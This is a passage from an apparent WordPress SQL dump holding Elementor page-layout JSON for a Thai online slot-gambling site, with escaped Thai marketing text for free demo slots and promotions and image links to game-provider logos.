\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1218,150,'_elementor_edit_mode','builder'),(1219,150,'_elementor_template_type','wp-page'),(1220,150,'_elementor_version','3.32.5'),(1221,150,'_elementor_pro_version','3.32.3'),(1222,150,'_wp_page_template','default'),(1223,150,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1224,150,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1225,150,'_thumbnail_id','61'),(1229,151,'_elementor_edit_mode','builder'),(1230,151,'_elementor_template_type','wp-page'),(1231,151,'_elementor_version','3.32.5'),(1232,151,'_elementor_pro_version','3.32.3'),(1233,151,'_wp_page_template','default'),(1234,151,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1235,151,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 